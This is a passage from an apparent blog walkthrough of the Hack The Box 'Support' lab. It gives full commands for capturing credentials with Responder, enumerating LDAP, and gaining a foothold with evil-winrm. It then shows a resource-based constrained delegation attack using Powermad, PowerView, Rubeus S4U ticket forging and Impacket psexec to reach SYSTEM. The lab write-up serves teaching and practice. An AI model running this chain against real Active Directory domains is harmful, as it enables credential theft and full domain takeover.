<p><a href="https://github.com/user-attachments/assets/2af24961-9446-49c0-8113-27ef6d562baa" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/2af24961-9446-49c0-8113-27ef6d562baa" alt="Capture d'écran 2025-05-01 164723" loading="lazy"></a></p>

<p>With this information, we proceeded with dynamic analysis. The goal was to intercept any credentials transmitted by the application when interacting with the LDAP server. To achieve this, we configured a fake LDAP server using <strong>Responder</strong>, a tool designed for poisoning <strong>LLMNR</strong>, <strong>NBT-NS</strong>, and <strong>MDNS</strong> requests. This would allow us to capture credentials from requests sent by the <code class="language-plaintext highlighter-rouge">UserInfo.exe</code> application.</p>
<h6 id="modify-etchosts-to-redirect-requests">Modify <code class="language-plaintext highlighter-rouge">/etc/hosts</code> to redirect requests</h6>

<p>To ensure that the target application communicates with our fake LDAP server, we first edited the <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file to redirect the <code class="language-plaintext highlighter-rouge">support.htb</code> domain to our local IP address. This is a necessary step as it ensures that any requests made by <code class="language-plaintext highlighter-rouge">UserInfo.exe</code> to the <code class="language-plaintext highlighter-rouge">support.htb</code> domain are directed to our machine, where <strong>Responder</strong> is running.</p>

<p>For example, we added the following line to <code class="language-plaintext highlighter-rouge">/etc/hosts</code> :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>&lt;local_IP&gt; support.htb
</pre></td></tr></tbody></table></code></div></div>
<h6 id="setting-up-responder-for-poisoning">Setting up responder for poisoning</h6>

<p>After modifying the <code class="language-plaintext highlighter-rouge">/etc/hosts</code> file, we started <strong>Responder</strong> with the following command :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>sudo responder -I tun0 -P -v
</pre></td></tr></tbody></table></code></div></div>

<p>This command initiated the poisoning process on the network interface <code class="language-plaintext highlighter-rouge">tun0</code>, enabling <strong>LLMNR</strong>, <strong>NBT-NS</strong>, and <strong>MDNS</strong> poisoning. Responder was also configured to capture the credentials sent in plain text, which included potential LDAP or SMB login attempts.</p>

<h6 id="executing-the-target-application">Executing the target application</h6>

<p>Next, we executed the <code class="language-plaintext highlighter-rouge">UserInfo.exe</code> binary using <strong>Mono</strong> on our Kali machine, as the application is a .NET executable. We ran the following command to query the LDAP server for user details :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>mono UserInfo.exe find -first administrator
</pre></td></tr></tbody></table></code></div></div>

<p>This command attempts to find the first “administrator” user in the environment, typically querying an LDAP server. The query is expected to trigger communication with the poisoned LDAP server we set up earlier.</p>

<h6 id="credential-capture">Credential capture</h6>

<p>While executing <code class="language-plaintext highlighter-rouge">UserInfo.exe</code>, Responder intercepted a request containing credentials in cleartext. The captured credentials were as follows :</p>

<p><a href="https://github.com/user-attachments/assets/3fa88111-2a86-4125-a1af-11010315fae3" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/3fa88111-2a86-4125-a1af-11010315fae3" alt="Capture d'écran 2025-05-01 171256" loading="lazy"></a></p>

<p>These credentials were displayed in Responder’s output, confirming that <strong>clear-text LDAP credentials</strong> were sent as part of the interaction between <code class="language-plaintext highlighter-rouge">UserInfo.exe</code> and the LDAP server.</p>

<p>To validate the credentials, we used <code class="language-plaintext highlighter-rouge">CrackMapExec</code> against the target host :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>crackmapexec smb support.htb -d support -u ldap -p &lt;PASSWORD&gt;
</pre></td></tr></tbody></table></code></div></div>

<p><a href="https://github.com/user-attachments/assets/4de60e52-e4f7-4254-af49-a479ad6b0725" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/4de60e52-e4f7-4254-af49-a479ad6b0725" alt="Capture d'écran 2025-05-01 174456" loading="lazy"></a></p>

<p>The login was successful, confirming the captured password is valid and can be used for further enumeration or privilege escalation.</p>

<hr />
<h3 id="ldap-search"><span class="me-2">LDAP search</span><a href="#ldap-search" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>We started by performing an LDAP search to enumerate the users in the <strong>support.htb</strong> domain using the following command :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>ldapsearch -x -H ldap://support.htb -D "support\\ldap" -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' -b "dc=support,dc=htb" "(objectClass=user)"
</pre></td></tr></tbody></table></code></div></div>

<p>Among the results, we identified the user <strong>support</strong> with the following relevant information :</p>

<p><a href="https://github.com/user-attachments/assets/ef5067e5-e53b-4983-8163-f84e2d47e047" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/ef5067e5-e53b-4983-8163-f84e2d47e047" alt="Capture d'écran 2025-05-01 181343" loading="lazy"></a></p>

<p>The <code class="language-plaintext highlighter-rouge">info</code> attribute contained a string that appeared to be a potential password.</p>

<p>Using <strong>CrackMapExec</strong>, we tested the extracted password for the <strong>support</strong> user on the <strong>support.htb</strong> machine :</p>

<p><a href="https://github.com/user-attachments/assets/57e1231c-78b5-4216-91fc-7842ee6c9350" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/57e1231c-78b5-4216-91fc-7842ee6c9350" alt="Capture d'écran 2025-05-01 181736" loading="lazy"></a></p>

<p>This confirmed that the password was valid and allowed us to authenticate successfully on the SMB service.</p>

<hr />
<h3 id="initial-foothold--user-flag"><span class="me-2">Initial foothold + user flag</span><a href="#initial-foothold--user-flag" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Once we confirmed the <strong>support</strong> user credentials were correct, we can try to use <strong>evil-winrm</strong> in order to gain access on the target system :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>evil-winrm -i support.htb -u support
</pre></td></tr></tbody></table></code></div></div>
<p><a href="https://github.com/user-attachments/assets/5e510f30-5dc4-4388-94fd-ac2fd9ab2c74" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/5e510f30-5dc4-4388-94fd-ac2fd9ab2c74" alt="Capture d'écran 2025-05-01 182340" loading="lazy"></a></p>

<p>After entering the password, we successfully connected to the target system and gained a remote PowerShell session and we can get the user flag.</p>

<hr />

<h3 id="bloodhound"><span class="me-2">Bloodhound</span><a href="#bloodhound" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>To further enumerate the Active Directory environment, we used <strong>BloodHound</strong>, a tool that helps identify privilege escalation paths and relationships within a domain. We leveraged our access to the <code class="language-plaintext highlighter-rouge">support</code> user via Evil-WinRM to execute the data collector <code class="language-plaintext highlighter-rouge">SharpHound.exe</code> directly on the target machine.</p>

<p>After uploading the <code class="language-plaintext highlighter-rouge">SharpHound.exe</code> using <code class="language-plaintext highlighter-rouge">evil-winrm</code>, we can execute the collector with all collection methods enabled :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>.\SharpHound.exe -c All
</pre></td></tr></tbody></table></code></div></div>

<p><a href="https://github.com/user-attachments/assets/e2d3679e-40b1-447f-8156-605a757568e8" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/e2d3679e-40b1-447f-8156-605a757568e8" alt="Capture d'écran 2025-05-01 183717" loading="lazy"></a></p>

<p>This gathered comprehensive information such as group memberships, sessions, ACLs, trusts, and more. After completion, a ZIP archive containing the collected data was generated :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>20250501093657_BloodHound.zip
</pre></td></tr></tbody></table></code></div></div>

<p>We can now download the ZIP to our local machine :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>download 20250501093657_BloodHound.zip
</pre></td></tr></tbody></table></code></div></div>

<p>Looking further into the BloodHound data, we observed that the <code class="language-plaintext highlighter-rouge">support</code> user is a member of the <strong>Shared Support Accounts</strong> group. This group has <strong>GenericAll</strong> rights over the domain controller computer object <code class="language-plaintext highlighter-rouge">DC.support.htb</code>.</p>

<p><a href="https://github.com/user-attachments/assets/c7c377f6-ebd6-48e8-ac30-c06adac62e55" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/c7c377f6-ebd6-48e8-ac30-c06adac62e55" alt="Capture d'écran 2025-05-01 193743" loading="lazy"></a></p>

<p>This means that the group and by extension the <code class="language-plaintext highlighter-rouge">support</code> user  has full control over this AD computer object, allowing actions such as modifying its attributes, setting a new machine password, or even performing a Resource-Based Constrained Delegation (RBCD) attack…</p>

<hr />

<h3 id="windows-abuse"><span class="me-2">Windows abuse</span><a href="#windows-abuse" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Before doing the <strong>Windows Absue</strong> we need to upload the following files into the target machine :</p>

<p><a href="https://github.com/user-attachments/assets/f566b74c-8e21-41e7-bd68-e34a8bf23e95" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/f566b74c-8e21-41e7-bd68-e34a8bf23e95" alt="Capture d'écran 2025-05-01 200819" loading="lazy"></a></p>

<p>Once the required tools are in place, we proceed with the first step of the abuse: creating a new machine account in the domain using the permissions associated with the <code class="language-plaintext highlighter-rouge">GenericAll</code> right on the domain controller object.</p>

<p>We use the <code class="language-plaintext highlighter-rouge">New-MachineAccount</code> function from <strong>Powermad</strong> to register a new computer object :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>New-MachineAccount -MachineAccount ControlledBypwn3d -Password $(ConvertTo-SecureString 'pwn3dthisbox!' -AsPlainText -Force)
</pre></td></tr></tbody></table></code></div></div>

<p><a href="https://github.com/user-attachments/assets/2ccd273c-ec9a-46ae-bf1a-7df4099f6c5a" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/2ccd273c-ec9a-46ae-bf1a-7df4099f6c5a" alt="Capture d'écran 2025-05-01 203502" loading="lazy"></a></p>

<p>And we can see that the command completes successfully, confirming the addition of the machine account. After adding our own machine account, we retrieved its SID using PowerView. This SID will be used to configure Resource-Based Constrained Delegation (RBCD), allowing our fake machine to impersonate users on the target system.</p>

<p>We did this <strong>by using the following command</strong> :</p>

<div class="language-powershell highlighter-rouge"><div class="code-header">
        <span data-label-text="Powershell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="nv">$ComputerSid</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">Get-DomainComputer</span><span class="w"> </span><span class="nx">ControlledBypwn3d</span><span class="w">  </span><span class="nt">-Properties</span><span class="w"> </span><span class="nx">objectsid</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Select</span><span class="w"> </span><span class="nt">-Expand</span><span class="w"> </span><span class="nx">objectsid</span><span class="w">
</span></pre></td></tr></tbody></table></code></div></div>

<p><a href="https://github.com/user-attachments/assets/ea846fd6-5312-433f-bc0a-b8884de791ec" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/ea846fd6-5312-433f-bc0a-b8884de791ec" alt="Capture d'écran 2025-05-01 205048" loading="lazy"></a></p>

<p>Next, we crafted a <strong>custom security descriptor</strong> that grants our fake machine full control over the target computer object. This step is necessary to set up <strong>Resource-Based Constrained Delegation (RBCD)</strong> :</p>

<div class="language-powershell highlighter-rouge"><div class="code-header">
        <span data-label-text="Powershell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
2
3
</pre></td><td class="rouge-code"><pre><span class="nv">$SD</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">Security.AccessControl.RawSecurityDescriptor</span><span class="w"> </span><span class="nt">-ArgumentList</span><span class="w"> </span><span class="s2">"O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;</span><span class="si">$(</span><span class="nv">$ComputerSid</span><span class="si">)</span><span class="s2">)"</span><span class="w">
</span><span class="nv">$SDBytes</span><span class="w"> </span><span class="o">=</span><span class="w"> </span><span class="n">New-Object</span><span class="w"> </span><span class="nx">byte</span><span class="p">[]</span><span class="w"> </span><span class="p">(</span><span class="nv">$SD</span><span class="o">.</span><span class="nf">BinaryLength</span><span class="p">)</span><span class="w">
</span><span class="nv">$SD</span><span class="o">.</span><span class="nf">GetBinaryForm</span><span class="p">(</span><span class="nv">$SDBytes</span><span class="p">,</span><span class="w"> </span><span class="nx">0</span><span class="p">)</span><span class="w">
</span></pre></td></tr></tbody></table></code></div></div>

<p>After adding the machine account and setting the security descriptor (<code class="language-plaintext highlighter-rouge">$SDBytes</code>) to the target computer, we configure it to allow delegation using the <code class="language-plaintext highlighter-rouge">msDS-AllowedToActOnBehalfOfOtherIdentity</code> attribute. This is the critical step for enabling <strong>resource-based constrained delegation</strong>.</p>

<div class="language-powershell highlighter-rouge"><div class="code-header">
        <span data-label-text="Powershell"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre><span class="n">Get-DomainComputer</span><span class="w"> </span><span class="nx">ControlledBypwn3d</span><span class="w"> </span><span class="o">|</span><span class="w"> </span><span class="n">Set-DomainObject</span><span class="w"> </span><span class="nt">-Set</span><span class="w"> </span><span class="p">@{</span><span class="s1">'msds-allowedtoactonbehalfofotheridentity'</span><span class="o">=</span><span class="nv">$SDBytes</span><span class="p">}</span><span class="w">
</span></pre></td></tr></tbody></table></code></div></div>

<p>This command essentially sets the newly created machine account (<code class="language-plaintext highlighter-rouge">ControlledBypwn3d</code>) with the ability to act on behalf of other identities (specifically the <code class="language-plaintext highlighter-rouge">administrator</code> in this case).</p>

<p>Next, we use <strong>Rubeus</strong> to hash the password for the newly created machine account into RC4-HMAC format, which is required for later steps where we impersonate the <code class="language-plaintext highlighter-rouge">administrator</code>.</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>./Rubeus.exe hash /password:pwn3dthisbox!
</pre></td></tr></tbody></table></code></div></div>

<p>This command provides us the RC4-HMAC :</p>

<p><a href="https://github.com/user-attachments/assets/e640da2a-45eb-424d-9cc0-209c9e3677cd" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/e640da2a-45eb-424d-9cc0-209c9e3677cd" alt="Capture d'écran 2025-05-01 213203" loading="lazy"></a></p>

<p>With the hashed password in hand, we can now perform <strong>Kerberos Service-for-User (S4U) authentication</strong>. This allows us to impersonate the <code class="language-plaintext highlighter-rouge">administrator</code> user by using the service ticket (<code class="language-plaintext highlighter-rouge">/rc4</code>) for <code class="language-plaintext highlighter-rouge">ControlledBypwn3d$</code> and request a ticket to access the file system of the target machine.</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>./Rubeus.exe s4u /user:ControlledBypwn3d$ /rc4:BD9A2BDE19C77D0C02319C0948D1E6D1 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
</pre></td></tr></tbody></table></code></div></div>

<p>This command performs the <strong>S4U impersonation</strong> of the <code class="language-plaintext highlighter-rouge">administrator</code> and injects the Kerberos ticket (<code class="language-plaintext highlighter-rouge">/ptt</code>) into the session, which grants us <strong>access to the target system</strong> as <code class="language-plaintext highlighter-rouge">administrator</code>.</p>

<hr />

<h3 id="privilege-escalation"><span class="me-2">Privilege escalation</span><a href="#privilege-escalation" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Rubeus provides us with a base64-encoded <code class="language-plaintext highlighter-rouge">.kirbi</code> ticket :</p>

<p><a href="https://github.com/user-attachments/assets/22372f70-eddc-4339-8d0f-8155635df2b0" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/22372f70-eddc-4339-8d0f-8155635df2b0" alt="Capture d'écran 2025-05-01 213750" loading="lazy"></a></p>

<p>We can then decode this ticket into its <code class="language-plaintext highlighter-rouge">.kirbi</code> form, which can be further used for authentication against services :</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>base64 -d pwn3d.kirbi &gt; ticket.kirbi
</pre></td></tr></tbody></table></code></div></div>

<p>Once we have the Kerberos ticket in <code class="language-plaintext highlighter-rouge">.kirbi</code> format, we use the <strong><code class="language-plaintext highlighter-rouge">ticketConverter.py</code></strong> script to convert it into a <strong>ccache</strong> format that can be used by various tools such as <strong>Impacket</strong>.</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>python3 ./ticketConverter.py ~/ctf/htb/Support/ticket.kirbi ticket.ccache
</pre></td></tr></tbody></table></code></div></div>

<p><a href="https://github.com/user-attachments/assets/3c1f5120-1e71-4407-948e-0e3c74664bfa" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/3c1f5120-1e71-4407-948e-0e3c74664bfa" alt="Capture d'écran 2025-05-01 214148" loading="lazy"></a></p>

<p>This command ensures the ticket is in the appropriate format for use with tools that require it, such as <code class="language-plaintext highlighter-rouge">psexec.py</code>.</p>

<p>With the <strong>Kerberos ccache</strong> file ready, we now use <strong>Impacket’s psexec.py</strong> to execute commands remotely on the target machine as <code class="language-plaintext highlighter-rouge">NT AUTHORITY\SYSTEM</code>. This step is crucial for gaining full administrative access to the machine, bypassing usual user restrictions.</p>

<div class="language-plaintext highlighter-rouge"><div class="code-header">
        <span data-label-text="Plaintext"><i class="fas fa-code fa-fw small"></i></span>
      <button aria-label="copy" data-title-succeed="Copied!"><i class="far fa-clipboard"></i></button></div><div class="highlight"><code><table class="rouge-table"><tbody><tr><td class="rouge-gutter gl"><pre class="lineno">1
</pre></td><td class="rouge-code"><pre>KRB5CCNAME=ticket.ccache python3 ./psexec.py support.htb/administrator@dc.support.htb -k -no-pass
</pre></td></tr></tbody></table></code></div></div>

<hr />
<h3 id="root-flag"><span class="me-2">Root flag</span><a href="#root-flag" class="anchor text-muted"><i class="fas fa-hashtag"></i></a></h3>

<p>Once the connection is established, we can now execute commands on the target system as <strong>NT AUTHORITY\SYSTEM</strong>, which grants us the highest level of privileges on the machine and we can finally get the root flag :</p>

<p><a href="https://github.com/user-attachments/assets/67871250-22cd-4c62-a8fa-0d49ffb56304" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/67871250-22cd-4c62-a8fa-0d49ffb56304" alt="Capture d'écran 2025-05-01 214212" loading="lazy"></a></p>

<p><a href="https://github.com/user-attachments/assets/84bc6a58-44ab-44c5-af4e-fb57f9271592" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/84bc6a58-44ab-44c5-af4e-fb57f9271592" alt="Capture d'écran 2025-05-01 214230" loading="lazy"></a></p>

<hr />

<p><strong>Congratulations!</strong><br />
This machine was a great opportunity to explore how small misconfigurations in an Active Directory environment can lead to a full domain compromise. From creating our own machine account to abusing delegation permissions, we gradually escalated our privileges until we were able to impersonate the domain administrator. With the help of custom Kerberos tickets and the right tools, we eventually gained full control over the domain controller.</p>

<p>A very rewarding challenge that highlights the importance of careful privilege management and the power of patience and methodical enumeration.</p>

<p>Thanks for reading and happy hacking! 
<a href="https://github.com/user-attachments/assets/9d493089-015e-4e43-bb12-239d534114b7" class="popup img-link  shimmer"><img src="https://github.com/user-attachments/assets/9d493089-015e-4e43-bb12-239d534114b7" alt="Capture d'écran 2025-05-01 214557" loading="lazy"></a></p>

  </div>

  <div class="post-tail-wrapper text-muted">
    <!-- categories -->
    
      <div class="post-meta mb-3">
        <i class="far fa-folder-open fa-fw me-1"></i>
        
          <a href="/categories/hack-the-box/">Hack The Box</a>
      </div>
    

    <!-- tags -->
    
      <div class="post-tags">
        <i class="fa fa-tags fa-fw me-1"></i>
        
          <a
            href="/tags/windows/"
            class="post-tag no-text-decoration"
          >windows</a>
        
          <a
            href="/tags/active-directory/"
            class="post-tag no-text-decoration"
          >active-directory</a>
        
          <a
            href="/tags/enumeration/"
            class="post-tag no-text-decoration"
          >enumeration</a>
        
          <a
            href="/tags/rbcd/"
            class="post-tag no-text-decoration"
          >rbcd</a>
        
          <a
            href="/tags/kerberos/"
            class="post-tag no-text-decoration"
          >kerberos</a>
        
          <a
            href="/tags/s4u/"
            class="post-tag no-text-decoration"
          >s4u</a>
        
          <a
            href="/tags/evil-winrm/"
            class="post-tag no-text-decoration"
          >evil-winrm</a>
        
          <a
            href="/tags/rubeus/"
            class="post-tag no-text-decoration"
          >rubeus</a>
        
          <a
            href="/tags/easy/"
            class="post-tag no-text-decoration"
          >easy</a>
        
      </div>
    

    <div
      class="
        post-tail-bottom
        d-flex justify-content-between align-items-center mt-5 pb-2
      "
    >
      <div class="license-wrapper">
        
          

          This post is licensed under 
        <a href="https://creativecommons.org/licenses/by/4.0/">
          CC BY 4.0
        </a>
         by the author.
        
      </div>

      <!-- Post sharing snippet -->

<div class="share-wrapper d-flex align-items-center">
  <span class="share-label text-muted">Share</span>
  <span class="share-icons">
    
    
    

    

      

      <a href="https://twitter.com/intent/tweet?text=Support%20-%20Hack%20The%20Box%20-%20Pwn3d&url=https%3A%2F%2Fx-pwn3d.github.io%2Fposts%2FSupport%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Twitter" aria-label="Twitter">
        <i class="fa-fw fa-brands fa-square-x-twitter"></i>
      </a>
    

      

      <a href="https://www.facebook.com/sharer/sharer.php?title=Support%20-%20Hack%20The%20Box%20-%20Pwn3d&u=https%3A%2F%2Fx-pwn3d.github.io%2Fposts%2FSupport%2F" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Facebook" aria-label="Facebook">
        <i class="fa-fw fab fa-facebook-square"></i>
      </a>
    

      

      <a href="https://t.me/share/url?url=https%3A%2F%2Fx-pwn3d.github.io%2Fposts%2FSupport%2F&text=Support%20-%20Hack%20The%20Box%20-%20Pwn3d" target="_blank" rel="noopener" data-bs-toggle="tooltip" data-bs-placement="top" title="Telegram" aria-label="Telegram">
        <i class="fa-fw fab fa-telegram"></i>
      </a>
    

    <button
      id="copy-link"
      aria-label="Copy link"
      class="btn small"
      data-bs-toggle="tooltip"
      data-bs-placement="top"
      title="Copy link"
      data-title-succeed="Link copied successfully!"
    >
      <i class="fa-fw fas fa-link pe-none fs-6"></i>
    </button>
  </span>
</div>

    </div>
    <!-- .post-tail-bottom -->
  </div>
  <!-- div.post-tail-wrapper -->
</article>


            
          </main>

          <!-- panel -->
          <aside aria-label="Panel" id="panel-wrapper" class="col-xl-3 ps-2 text-muted">
            <div class="access">
              <!-- Get 5 last posted/updated posts -->














  <section id="access-lastmod">
    <h2 class="panel-heading">Recently Updated</h2>
    <ul class="content list-unstyled ps-0 pb-1 ms-1 mt-2">
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Capture/">Capture - TryHackMe</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/TakeOver/">TakeOver - TryHackMe</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/MD2PDF/">MD2PDF - TryHackMe</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Dog/">Dog - Hack The Box</a>
        </li>
      
        
        
        
        <li class="text-truncate lh-lg">
          <a href="/posts/Support/">Support - Hack The Box</a>
        </li>
      
    </ul>
  </section>
  <!-- #access-lastmod -->


              <!-- The trending tags list -->















  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
      
        
        

  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
    
  
    
    
    
